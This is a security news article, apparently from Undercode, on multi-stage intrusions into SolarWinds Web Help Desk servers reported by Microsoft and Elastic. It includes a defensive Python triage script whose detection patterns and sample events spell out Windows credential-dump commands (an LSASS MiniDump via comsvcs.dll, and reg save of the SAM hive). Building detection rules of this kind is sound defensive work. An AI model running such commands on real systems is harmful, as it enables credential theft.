Microsoft and Elastic Expose Stealthy SolarWinds Web Help Desk Intrusions Active Since December 2025

Introduction: A Quiet Breach That Didn’t Stay Quiet for Long

A new wave of targeted intrusions has pushed enterprise IT support infrastructure back into the cybersecurity spotlight. Researchers from Microsoft and Elastic have uncovered a series of multi-stage attacks abusing SolarWinds Web Help Desk (WHD) servers, active since at least December 2025. What makes this campaign especially dangerous is not a flashy zero-day but how quietly the attackers blended into normal administrative activity, using legitimate tools, trusted processes, and remote management features to stay hidden for weeks or months.

The Original Report

The investigation reveals that attackers specifically targeted on-premises SolarWinds Web Help Desk servers, a tool widely used by IT teams to manage tickets, assets, and internal support workflows. Once access was gained, the intruders ran a multi-stage intrusion chain designed to look like routine system maintenance.

Initial access was followed by remotely triggered MSI package installations, which let the attackers deploy additional payloads through a trusted installer channel rather than an obviously suspicious dropper. Instead of dropping custom malware right away, they relied heavily on Remote Monitoring and Management (RMM) tools, a tactic that let them operate under the guise of legitimate IT administration.

Credential dumping then secured the attackers' ongoing access, again without exotic malware: they used well-known, legitimate system utilities already present on Windows. This "living-off-the-land" approach reduced their footprint and made detection significantly harder.

Telemetry shared by Microsoft and Elastic suggests the activity began as early as December 2025, meaning some organizations may have been compromised for weeks or longer before any indicators surfaced. The campaign showed signs of careful planning, with attackers prioritizing stealth, lateral movement potential, and long-term access over immediate data destruction or ransomware deployment.

Crucially, no single exploit or vulnerability was highlighted as the sole entry point. Instead, the campaign appears to have leveraged exposed or weakly secured WHD servers, combined with poor credential hygiene and overly permissive remote access configurations. This aligns with a growing trend where attackers exploit operational blind spots rather than purely technical flaws.

Both Microsoft and Elastic emphasize that the abuse of legitimate tools, signed installers, and standard admin workflows dramatically complicates detection. Traditional signature-based defenses may see nothing more than “normal IT behavior,” allowing attackers to persist unnoticed inside trusted systems.

What Undercode Says:

This campaign is a textbook example of how modern intrusions no longer need loud exploits to be effective. The attackers did not break down the door; they walked in wearing an IT badge.

SolarWinds Web Help Desk sits in a uniquely sensitive position. It often runs with elevated privileges, touches internal networks, and is trusted by default. Compromising it offers attackers a vantage point that is operationally rich but rarely scrutinized as aggressively as domain controllers or email servers.

The real danger here is not SolarWinds itself; it is how enterprises treat internal tools as inherently safe. Once attackers can install MSI packages remotely and invoke RMM utilities, they effectively inherit the same powers as an internal administrator. From there, credential dumping looks less like an "attack" and more like a routine administrative action that nobody questioned.

What stands out is the discipline of the intrusion chain. No rush to ransomware. No noisy data exfiltration. Just quiet persistence. This is consistent with either an espionage-motivated actor or a financially motivated group preparing high-value access for later monetization.

Defenders should also take note: EDR visibility alone is not enough when attackers intentionally mimic normal behavior. Context matters. Why is an RMM tool being deployed at 3 a.m.? Why is a help desk server installing MSI packages unrelated to ticketing functions? These are behavioral questions, not signature problems.
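Those behavioral questions can be turned into a first-pass triage rule. The script below is an added example written for this article; it is not code from the Microsoft or Elastic reports, nor from SolarWinds. It scores constructed Windows process-creation events from a help desk host for the three behaviors described above: msiexec installs pulled from a remote package source under the WHD service context, an RMM agent appearing on a ticketing server, and credential-dump command lines built from built-in Windows utilities, with an off-hours modifier. The event field names, the WHD service account and parent process name, the RMM watch-list, the scoring weights, and the 07:00 to 20:00 business-hours window are all assumptions, and the sample events are constructed.

```python
"""Behavioral triage over constructed process-creation events from a
help desk server. Added example, not code from the reports or from
SolarWinds. Every constant below is an assumption, not a reported IOC."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Optional

# ASSUMPTION: how the WHD application shows up in process telemetry.
WHD_SERVICE_ACCOUNT = "NT SERVICE\\WebHelpDesk"   # hypothetical
WHD_PARENT = "whd.exe"                             # hypothetical

# ASSUMPTION: RMM agents that have no business on a ticketing server.
RMM_WATCHLIST = {"anydesk.exe", "screenconnect.clientservice.exe",
                 "ateraagent.exe", "splashtopstreamer.exe"}

# Credential-dump command lines built from utilities already on Windows
# (first item is the image name, the rest must all appear in the cmdline).
CRED_DUMP_PATTERNS = [
    ("rundll32.exe", "comsvcs.dll", "minidump"),   # LSASS dump via comsvcs
    ("reg.exe", "save", "hklm\\sam"),              # SAM hive export
    ("reg.exe", "save", "hklm\\security"),         # LSA secrets export
    ("ntdsutil.exe", "ifm"),                       # NTDS.dit via IFM media
]

BUSINESS_HOURS = range(7, 20)  # ASSUMPTION: 07:00-19:59 local time


@dataclass
class Finding:
    ts: str
    rule: str
    score: int
    detail: str


def _off_hours(ts: str) -> bool:
    return datetime.fromisoformat(ts).hour not in BUSINESS_HOURS


def _msi_source(cmdline: str) -> Optional[str]:
    """Package path following msiexec's /i or /package switch, if any."""
    m = re.search(r'(?:/i|/package)\s+"?([^\s"]+)', cmdline, re.IGNORECASE)
    return m.group(1) if m else None


def _is_remote_path(path: str) -> bool:
    p = path.lower()
    return p.startswith("\\\\") or p.startswith(("http://", "https://"))


def score_event(ev: dict) -> Optional[Finding]:
    """Return a Finding for one event, or None if no rule matches."""
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    cmd = ev["cmdline"].lower()
    off = _off_hours(ev["ts"])
    bonus = 2 if off else 0

    # Rule 1: credential dumping with living-off-the-land utilities.
    for exe, *needles in CRED_DUMP_PATTERNS:
        if image == exe and all(n in cmd for n in needles):
            return Finding(ev["ts"], "cred_dump_lolbin", 5 + bonus, ev["cmdline"])

    # Rule 2: RMM agent process on the help desk host.
    if image in RMM_WATCHLIST:
        return Finding(ev["ts"], "rmm_on_whd_host", 4 + bonus, image)

    # Rule 3: MSI install, weighted by remote source, WHD context, off-hours.
    if image == "msiexec.exe":
        src = _msi_source(ev["cmdline"])
        if src is not None:
            score = 1                       # local install in hours is baseline
            if _is_remote_path(src):
                score += 2                  # package fetched from UNC/URL
            if ev.get("parent", "").lower() == WHD_PARENT \
                    or ev.get("user", "") == WHD_SERVICE_ACCOUNT:
                score += 2                  # launched from the WHD context
            score += bonus
            return Finding(ev["ts"], "msi_install", score, src)
    return None


def triage(events, threshold: int = 3):
    """Score every event and return findings at or above threshold,
    highest score first, then chronological."""
    found = [f for f in map(score_event, events) if f and f.score >= threshold]
    return sorted(found, key=lambda f: (-f.score, f.ts))


# Constructed sample telemetry (not real events from any victim).
SAMPLE_EVENTS = [
    {"ts": "2025-12-14T03:12:44", "user": WHD_SERVICE_ACCOUNT, "parent": "whd.exe",
     "image": "msiexec.exe",
     "cmdline": "msiexec.exe /i \\\\10.0.0.5\\share\\agent.msi /qn"},
    {"ts": "2025-12-14T03:15:10", "user": "SYSTEM", "parent": "msiexec.exe",
     "image": "C:\\Program Files\\AnyDesk\\anydesk.exe", "cmdline": "anydesk.exe --service"},
    {"ts": "2025-12-14T03:40:02", "user": "SYSTEM", "parent": "cmd.exe",
     "image": "rundll32.exe",
     "cmdline": "rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump 712 C:\\temp\\l.dmp full"},
    {"ts": "2025-12-14T04:01:00", "user": "SYSTEM", "parent": "cmd.exe",
     "image": "reg.exe", "cmdline": "reg.exe save HKLM\\SAM C:\\temp\\sam.hiv"},
    {"ts": "2025-12-15T10:05:00", "user": "CORP\\svc_patch", "parent": "services.exe",
     "image": "msiexec.exe", "cmdline": "msiexec.exe /i C:\\Updates\\WHD-12.8.msi /qn"},
    {"ts": "2025-12-15T10:06:30", "user": "CORP\\jdoe", "parent": "explorer.exe",
     "image": "notepad.exe", "cmdline": "notepad.exe ticket.txt"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.ts} score={f.score} {f.rule}: {f.detail}")
```

Run as-is, the script surfaces the 03:12 remote MSI install from the WHD context, both credential-dump commands, and the RMM agent, while the daytime patch-account install of a local package scores below the threshold. The weights are deliberately simple; the point is that the same msiexec event is benign or alarming depending on source path, launching context, and time of day, which is exactly the context a signature cannot carry.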

From a strategic perspective, this incident reinforces a hard truth: internal infrastructure must be threat-modeled like external-facing assets. Help desk platforms, backup servers, monitoring dashboards: these are now prime targets because they are trusted, powerful, and often overlooked.

Organizations that still assume “if it’s internal, it’s safe” are already behind.

Fact Checker Results

Microsoft and Elastic did publicly report multi-stage intrusions linked to SolarWinds Web Help Desk activity.

The attack relied heavily on legitimate tools, MSI installers, and RMM abuse rather than custom malware.

No evidence currently confirms large-scale ransomware deployment directly tied to this campaign.

Prediction

Expect a surge in targeted attacks against IT management and support platforms throughout 2026. As detection improves around endpoints and email, attackers will increasingly weaponize trusted internal systems—turning everyday administrative tools into long-term access gateways rather than one-time breach points.
